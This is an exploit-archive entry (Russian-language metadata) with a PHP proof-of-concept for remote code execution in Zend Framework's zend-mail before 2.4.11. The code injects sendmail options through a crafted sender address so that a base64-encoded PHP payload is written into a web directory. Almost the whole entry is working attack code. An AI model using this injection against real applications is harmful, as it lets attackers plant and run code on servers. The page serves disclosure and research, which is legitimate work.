Zend Framework / zend-mail < 2.4.11 - Remote Code Execution

Свойства

Дата публикации:
09.01.2017
Цель:
Zend Framework / zend-mail < 2.4.11
Тип воздействия:
Компрометация системы

Код


09607 <<< 
09607 <<< 
09607 <<< 
  
  
See the full advisory URL for the exploit details.
  
*/
  
  
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
  
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");
 
 
 
// ------------------
  
// mail() param injection via the vulnerability in zend-mail
 
 
chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';
 
Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' => array(
                'autoregister_zf' => true
        )
));
 
Zend\Mvc\Application::init(require 'config/application.php')->run();
 
$message        = new \Zend\Mail\Message();
 
$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');
 
$transport  = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);
 
?>